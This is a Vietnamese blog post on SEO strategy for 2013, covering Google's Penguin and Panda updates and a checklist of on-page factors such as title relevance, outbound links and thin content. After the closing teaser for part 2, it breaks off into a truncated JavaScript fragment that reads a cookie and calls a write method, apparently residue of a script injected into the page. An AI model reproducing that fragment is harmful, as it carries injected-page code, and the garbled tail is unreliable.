Chiến lược SEO 2013 phần 1

Nghề SEO ngày một vất vả, Google ngày càng khó đoán, khó làm theo, khó lên top, tóm lại là khó chịu! Năm 2012 vừa rồi đánh dấu một số bước ngoặt khá lớn của Google Search khi cho ra mắt thuật toán Google Penguin và cập nhật liên tục thuật toán Panda. Năm 2013 còn hứa hẹn nhiều sự thay đổi “thú vị” hơn. Vậy chúng ta phải làm gì để đi trước đón đầu cho chiến lược SEO năm nay?

1. Tối ưu Onpage

Tối ưu Onpage có thể chia làm 2 phần chính: tối ưu cho Google Bot và tối ưu cho người dùng. Trong khi Google Bot cần sự rõ ràng, cấu trúc hợp lý, không lỗi link thì người dùng lại cần thiết kế đẹp mắt, nhiều Rich Media, thông tin đầy đủ và rõ ràng. Từ hai phần cơ bản này bạn có thể lập ra một list Onpage Seo Check List cho mình. Nếu bạn chưa nắm được các kiến thức Onpage cơ bản, mời bạn tìm hiểu Blog của Pridio hoặc các trang thông tin khác.

Năm 2013, ta sẽ phải chú ý các yếu tố Onpage sau:

  • Bài viết không liên quan đến Title: ví dụ tôi viết một bài về SEO mà lại chèn thêm từ khóa thiết kế web vào Title. Trước đây thủ thuật này khá hiệu quả, tuy nhiên sau vài lần kiểm nghiệm gần đây của Pridio thì yếu tố này dần giảm tác động, thậm chí gây tác động xấu.
  • Những Page có quá nhiều Link out: Điều này khỏi bàn.
  • Những Page có nội dung ngắn (dưới 300 từ): khá khó khăn cho các bạn làm các trang sản phẩm đặc thù mà rất ít nội dung cho nó.
  • Những Page có cache dates đã từ lâu: Điều này chứng tỏ Google Bot không thường xuyên vào website, chúng ta sẽ phải có cách để kéo thêm người dùng và cả GBot về.
  • Những Domain có ít Traffic.

Nhìn có vẻ khó nhằn nhưng thực ra rất đơn giản. Các bạn nên nhớ là muốn được Google “yêu quý” thì phải hiểu được nguyên tắc của “sự phù hợp”. Công việc SEO sẽ ngày càng khổ hơn, tuy nhiên lại ít đối thủ hơn, có khi lại hay phải không các bạn?

Kỳ 2: Chiến lược SEO 2013 : Backlinks. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘